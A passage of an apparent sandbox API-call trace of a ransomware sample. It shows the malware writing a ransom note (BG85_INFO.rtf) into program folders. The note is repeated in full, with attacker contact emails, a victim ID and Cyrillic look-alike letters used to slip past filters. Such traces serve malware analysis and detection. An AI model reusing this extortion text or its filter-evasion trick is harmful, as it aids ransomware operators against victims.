lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.721] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.723] CloseHandle (hObject=0x1dc) returned 1 [0065.723] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\bg85_info.rtf")) returned 0xffffffff [0065.723] GetLastError () returned 0x2 [0065.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.724] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.724] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct 